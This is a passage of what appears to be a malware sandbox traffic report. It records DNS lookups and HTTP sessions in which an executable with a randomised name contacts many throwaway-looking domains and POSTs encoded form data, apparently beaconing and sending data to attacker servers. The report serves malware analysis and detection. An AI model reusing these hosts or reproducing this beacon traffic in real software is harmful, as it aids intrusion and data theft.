                                                                              Jan 14, 2025 10:27:05.120469093 CET5761980192.168.2.484.32.84.32
                                                                              Jan 14, 2025 10:27:05.120609999 CET805761984.32.84.32192.168.2.4
                                                                              Jan 14, 2025 10:27:05.120660067 CET5761980192.168.2.484.32.84.32
                                                                              Jan 14, 2025 10:27:05.125092983 CET5761980192.168.2.484.32.84.32
                                                                              Jan 14, 2025 10:27:05.129930019 CET805761984.32.84.32192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2025 10:24:20.972897053 CET53519451.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:28.115820885 CET6516553192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:28.133649111 CET53651651.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:34.520263910 CET5352900162.159.36.2192.168.2.4
                                                                              Jan 14, 2025 10:24:35.030949116 CET5966553192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:35.039347887 CET53596651.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:43.690145969 CET5237453192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:44.307868004 CET53523741.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:24:52.359692097 CET6330853192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:24:52.906167030 CET53633081.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:25:06.454384089 CET6143353192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:25:06.466124058 CET53614331.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:25:19.767543077 CET6533053192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:25:19.781243086 CET53653301.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:25:33.140636921 CET5486453192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:25:33.287178040 CET53548641.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:25:46.421931982 CET5174253192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:25:46.432100058 CET53517421.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:25:54.486118078 CET5412853192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:25:54.857702971 CET53541281.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:26:08.421919107 CET6447053192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:26:08.435400963 CET53644701.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:26:21.579468966 CET5769853192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:26:21.591988087 CET53576981.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:26:34.720577002 CET5466453192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:26:34.735532999 CET53546641.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:26:48.781383991 CET6172253192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:26:48.789961100 CET53617221.1.1.1192.168.2.4
                                                                              Jan 14, 2025 10:26:56.844208956 CET5885953192.168.2.41.1.1.1
                                                                              Jan 14, 2025 10:26:56.891012907 CET53588591.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 10:24:28.115820885 CET192.168.2.41.1.1.10x9514Standard query (0)www.thesquare.worldA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:35.030949116 CET192.168.2.41.1.1.10xd10eStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:43.690145969 CET192.168.2.41.1.1.10xfb0aStandard query (0)www.revolutionmusic.netA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:52.359692097 CET192.168.2.41.1.1.10x9a30Standard query (0)www.wddb97.topA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:06.454384089 CET192.168.2.41.1.1.10x696cStandard query (0)www.nexula.websiteA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:19.767543077 CET192.168.2.41.1.1.10xb682Standard query (0)www.prediksipreman.fyiA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:33.140636921 CET192.168.2.41.1.1.10x4b17Standard query (0)www.scottconsults.topA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:46.421931982 CET192.168.2.41.1.1.10xc871Standard query (0)www.xtelify.techA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:54.486118078 CET192.168.2.41.1.1.10x657Standard query (0)www.2q33e.topA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:08.421919107 CET192.168.2.41.1.1.10xa97Standard query (0)www.7wkto5nk230724z.clickA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:21.579468966 CET192.168.2.41.1.1.10x3549Standard query (0)www.livingslab.netA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:34.720577002 CET192.168.2.41.1.1.10xba25Standard query (0)www.quickcommerce.cloudA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:48.781383991 CET192.168.2.41.1.1.10x893eStandard query (0)www.cybermisha.storeA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:56.844208956 CET192.168.2.41.1.1.10x4cd9Standard query (0)www.xpremio.onlineA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 10:24:28.133649111 CET1.1.1.1192.168.2.40x9514No error (0)www.thesquare.world13.248.169.48A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:28.133649111 CET1.1.1.1192.168.2.40x9514No error (0)www.thesquare.world76.223.54.146A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:35.039347887 CET1.1.1.1192.168.2.40xd10eName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:44.307868004 CET1.1.1.1192.168.2.40xfb0aServer failure (2)www.revolutionmusic.netnonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:52.906167030 CET1.1.1.1192.168.2.40x9a30No error (0)www.wddb97.topwddb97.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:24:52.906167030 CET1.1.1.1192.168.2.40x9a30No error (0)wddb97.top206.119.82.172A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:06.466124058 CET1.1.1.1192.168.2.40x696cNo error (0)www.nexula.website67.223.117.142A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:19.781243086 CET1.1.1.1192.168.2.40xb682No error (0)www.prediksipreman.fyiprediksipreman.fyiCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:19.781243086 CET1.1.1.1192.168.2.40xb682No error (0)prediksipreman.fyi162.0.215.244A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:33.287178040 CET1.1.1.1192.168.2.40x4b17No error (0)www.scottconsults.topscottconsults.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:33.287178040 CET1.1.1.1192.168.2.40x4b17No error (0)scottconsults.top3.33.130.190A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:33.287178040 CET1.1.1.1192.168.2.40x4b17No error (0)scottconsults.top15.197.148.33A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:46.432100058 CET1.1.1.1192.168.2.40xc871Name error (3)www.xtelify.technonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:54.857702971 CET1.1.1.1192.168.2.40x657No error (0)www.2q33e.top2q33e.topCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:25:54.857702971 CET1.1.1.1192.168.2.40x657No error (0)2q33e.top38.47.233.52A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:08.435400963 CET1.1.1.1192.168.2.40xa97No error (0)www.7wkto5nk230724z.click104.21.3.193A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:08.435400963 CET1.1.1.1192.168.2.40xa97No error (0)www.7wkto5nk230724z.click172.67.131.32A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:21.591988087 CET1.1.1.1192.168.2.40x3549No error (0)www.livingslab.netlivingslab.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:21.591988087 CET1.1.1.1192.168.2.40x3549No error (0)livingslab.net3.33.130.190A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:21.591988087 CET1.1.1.1192.168.2.40x3549No error (0)livingslab.net15.197.148.33A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:34.735532999 CET1.1.1.1192.168.2.40xba25No error (0)www.quickcommerce.cloudquickcommerce.cloudCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:34.735532999 CET1.1.1.1192.168.2.40xba25No error (0)quickcommerce.cloud20.244.96.65A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:48.789961100 CET1.1.1.1192.168.2.40x893eName error (3)www.cybermisha.storenonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:56.891012907 CET1.1.1.1192.168.2.40x4cd9No error (0)www.xpremio.onlinexpremio.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 10:26:56.891012907 CET1.1.1.1192.168.2.40x4cd9No error (0)xpremio.online84.32.84.32A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.thesquare.world
                                                                              • www.wddb97.top
                                                                              • www.nexula.website
                                                                              • www.prediksipreman.fyi
                                                                              • www.scottconsults.top
                                                                              • www.2q33e.top
                                                                              • www.7wkto5nk230724z.click
                                                                              • www.livingslab.net
                                                                              • www.quickcommerce.cloud
                                                                              • www.xpremio.online

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.44922313.248.169.48804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:24:28.150047064 CET442OUTGET /4qxi/?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M= HTTP/1.1
                                                                              Host: www.thesquare.world
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:24:28.619780064 CET379INHTTP/1.1 200 OK
                                                                              content-type: text/html
                                                                              date: Tue, 14 Jan 2025 09:24:28 GMT
                                                                              content-length: 258
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 76 56 3d 32 6e 6a 44 36 66 38 30 45 44 4f 4c 51 38 26 77 7a 34 3d 32 65 32 4c 79 79 64 62 35 59 58 75 66 65 75 71 46 64 36 77 48 50 6b 57 75 45 70 48 67 46 2b 74 38 58 36 52 37 78 2f 43 68 75 2f 6c 64 78 71 55 46 77 4f 46 58 49 6d 59 65 65 37 45 37 4b 6c 71 71 43 4d 75 41 6a 64 37 75 4a 65 5a 4e 39 79 46 58 77 4f 4e 4f 6a 72 30 6e 78 53 36 2b 2b 55 78 50 62 43 6f 2f 52 33 2f 34 50 56 37 35 31 4e 67 46 34 6b 36 6c 35 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OvV=2njD6f80EDOLQ8&wz4=2e2Lyydb5YXufeuqFd6wHPkWuEpHgF+t8X6R7x/Chu/ldxqUFwOFXImYee7E7KlqqCMuAjd7uJeZN9yFXwONOjr0nxS6++UxPbCo/R3/4PV751NgF4k6l5M="}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.457319206.119.82.172804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:24:52.923654079 CET694OUTPOST /p75v/ HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.wddb97.top
                                                                              Referer: http://www.wddb97.top/p75v/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 4c 4a 4f 50 6d 69 4b 66 54 65 49 42 4d 75 74 42 7a 76 7a 46 72 68 49 79 71 51 77 62 52 4f 74 6a 6b 7a 54 52 76 2b 50 44 34 49 43 4c 57 31 6e 35 4b 4c 78 48 37 68 34 66 31 56 64 51 52 62 62 2b 78 65 32 53 74 58 64 38 64 68 61 41 77 46 6f 56 2f 32 7a 6d 54 46 52 6f 48 38 61 58 6b 6b 65 37 4d 33 34 37 69 71 35 63 72 72 2b 54 31 58 79 44 6d 53 6d 79 64 73 35 58 66 41 70 79 6d 4b 4b 70 62 71 30 30 79 77 6b 49 73 6d 4a 48 45 6e 70 77 59 71 61 75 76 47 73 4c 50 52 31 74 59 71 73 37 66 4e 75 6d 41 61 35 74 50 39 79 2f 78 4c 6e 39 73 78 61 37 62 70 72 32 67 50 38 6e 2b 47 53 6c 46 67 3d 3d
                                                                              Data Ascii: wz4=LJOPmiKfTeIBMutBzvzFrhIyqQwbROtjkzTRv+PD4ICLW1n5KLxH7h4f1VdQRbb+xe2StXd8dhaAwFoV/2zmTFRoH8aXkke7M347iq5crr+T1XyDmSmyds5XfApymKKpbq00ywkIsmJHEnpwYqauvGsLPR1tYqs7fNumAa5tP9y/xLn9sxa7bpr2gP8n+GSlFg==
                                                                              Jan 14, 2025 10:24:53.838659048 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:24:53 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66aa3a46-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.457320206.119.82.172804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:24:55.466136932 CET714OUTPOST /p75v/ HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.wddb97.top
                                                                              Referer: http://www.wddb97.top/p75v/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 4c 4a 4f 50 6d 69 4b 66 54 65 49 42 65 66 39 42 2f 74 62 46 73 42 49 78 6c 77 77 62 66 75 74 76 6b 7a 66 52 76 37 33 54 37 37 6d 4c 57 56 33 35 62 36 78 48 2b 68 34 66 2b 31 64 66 56 62 62 70 78 65 79 61 74 57 68 38 64 68 6d 41 77 46 34 56 2f 46 62 68 53 56 52 75 53 4d 62 78 67 6b 65 37 4d 33 34 37 69 71 74 32 72 72 6d 54 31 6d 43 44 38 7a 6d 39 65 73 35 55 49 77 70 79 33 61 4b 74 62 71 30 4b 79 79 41 69 73 6b 42 48 45 69 56 77 64 6f 2b 76 6c 47 74 41 52 68 30 35 4a 6f 4a 4d 5a 35 32 76 48 62 70 57 46 64 2b 59 30 4e 71 6e 39 41 37 73 4a 70 50 46 39 49 31 54 7a 46 76 73 65 73 4c 63 35 63 59 64 6a 73 54 4d 63 4c 36 34 70 68 6d 62 6b 57 41 3d
                                                                              Data Ascii: wz4=LJOPmiKfTeIBef9B/tbFsBIxlwwbfutvkzfRv73T77mLWV35b6xH+h4f+1dfVbbpxeyatWh8dhmAwF4V/FbhSVRuSMbxgke7M347iqt2rrmT1mCD8zm9es5UIwpy3aKtbq0KyyAiskBHEiVwdo+vlGtARh05JoJMZ52vHbpWFd+Y0Nqn9A7sJpPF9I1TzFvsesLc5cYdjsTMcL64phmbkWA=
                                                                              Jan 14, 2025 10:24:56.386970043 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:24:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66aa3a46-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.457327206.119.82.172804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:24:58.014214039 CET10796OUTPOST /p75v/ HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.wddb97.top
                                                                              Referer: http://www.wddb97.top/p75v/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 4c 4a 4f 50 6d 69 4b 66 54 65 49 42 65 66 39 42 2f 74 62 46 73 42 49 78 6c 77 77 62 66 75 74 76 6b 7a 66 52 76 37 33 54 37 37 75 4c 57 6e 50 35 4a 70 5a 48 35 68 34 66 39 31 63 34 56 62 61 72 78 61 57 65 74 57 74 73 64 6b 71 41 79 6d 67 56 76 30 62 68 63 56 52 75 4e 63 62 6c 6b 6b 65 55 4d 33 6f 2f 69 70 56 32 72 72 6d 54 31 6c 61 44 71 79 6d 39 53 4d 35 58 66 41 70 32 6d 4b 4b 56 62 71 73 61 79 79 45 59 76 51 31 48 4b 6a 6c 77 66 37 61 76 74 47 74 43 51 68 30 78 4a 6f 31 54 5a 34 66 57 48 62 64 38 46 66 69 59 35 4d 66 72 69 78 6a 45 56 62 4f 66 68 36 6f 31 34 48 6e 5a 54 4d 2f 36 38 73 49 55 39 4e 6e 75 51 71 6e 2f 7a 30 6d 5a 31 52 38 6f 72 6e 6d 72 4f 74 35 4d 77 46 6c 71 4a 41 63 59 6b 71 64 37 41 42 52 77 68 71 32 75 71 63 33 38 77 38 6d 6b 34 67 53 33 45 4a 74 4c 49 4c 56 4f 38 6f 51 35 78 44 50 63 6d 66 65 58 77 46 2b 30 36 6b 49 2b 53 6c 62 55 46 37 70 35 76 48 68 45 64 67 30 64 5a 59 56 37 6e 6a 67 65 30 63 77 2f 2b 31 73 43 35 75 50 58 37 2b 49 47 76 57 70 49 66 47 4c 4e 47 64 [TRUNCATED]
                                                                              Data Ascii: wz4=LJOPmiKfTeIBef9B/tbFsBIxlwwbfutvkzfRv73T77uLWnP5JpZH5h4f91c4VbarxaWetWtsdkqAymgVv0bhcVRuNcblkkeUM3o/ipV2rrmT1laDqym9SM5XfAp2mKKVbqsayyEYvQ1HKjlwf7avtGtCQh0xJo1TZ4fWHbd8FfiY5MfrixjEVbOfh6o14HnZTM/68sIU9NnuQqn/z0mZ1R8ornmrOt5MwFlqJAcYkqd7ABRwhq2uqc38w8mk4gS3EJtLILVO8oQ5xDPcmfeXwF+06kI+SlbUF7p5vHhEdg0dZYV7njge0cw/+1sC5uPX7+IGvWpIfGLNGdGB7SIh1LX3G+qFG+IXwra4fSMjfxTehPj6TXd41i99Kgod2oi2vmop79f+9MTy5K9XdFP+ncUzMoad31G6/z44Y9l3BuUu25d32SIv0GDlGoWmmC0GaSijGRdfs+qsC1jR9skjgqP7KT0vj6waSinv2MPs10gdjNeZuvBfuj9MoPQmasqFU+rVM67aYadFbOYPyr0+fIKqRFgmhbaH9FouLbQEu8hRY8yHZToQ/C8ER12AURTswWpeoDz7CSqccqbfoqD83PxtKx/+s0g6GWZQQqW7+emoaFQfvLfCAvbVkWr0Y1rZ0YyA4Qxk9oRGQOJUg883hDEDB/oL9lyfK9ajhn207kdxdRZ9wHVclubxAn3ShPftXul6vj4zIe1JEYw6d70cgaTAZHEh7WVMx8T89MgJPuc/PQvn54zoz54iClFiKoDGJDf8WDe/0xKCvZ8T4Phs2YfwgF5urL8NMG0q8o/WbQxua6+Dfh5GMVpujB2DkjxKHa7hPIfBpNz4GUoKjjoq9kj9lAx7y4hUm61KZKvF94ttUA9Pw6AI16Hh6pltM4xH4uZY+ByrdWTCnl7qgHJRFIihFRTs+NYqGSzZFfRmWf9PrzKoeRMnhEnY9qSxg4oSIyG7VC+413GysAqBoXkac5v/155Rzg1X60gza6q34j9HEuHJ [TRUNCATED]
                                                                              Jan 14, 2025 10:24:58.923877954 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:24:58 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66aa3a46-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.457343206.119.82.172804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:00.558845043 CET437OUTGET /p75v/?OvV=2njD6f80EDOLQ8&wz4=GLmvlUrKOeNEevY3wcyfjSkNrwRDbMR2/x32zMvR34mmT0X9ObY05SVA9W4yUMrr2Yq11ERvKU6w2wYb4X7EbFt4LfTn3Wu5NGMirqATx7GUx0yxlSOAJso= HTTP/1.1
                                                                              Host: www.wddb97.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:25:01.443435907 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:25:01 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66aa3a46-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.45737467.223.117.142804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:06.500929117 CET706OUTPOST /ro4w/ HTTP/1.1
                                                                              Host: www.nexula.website
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.nexula.website
                                                                              Referer: http://www.nexula.website/ro4w/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
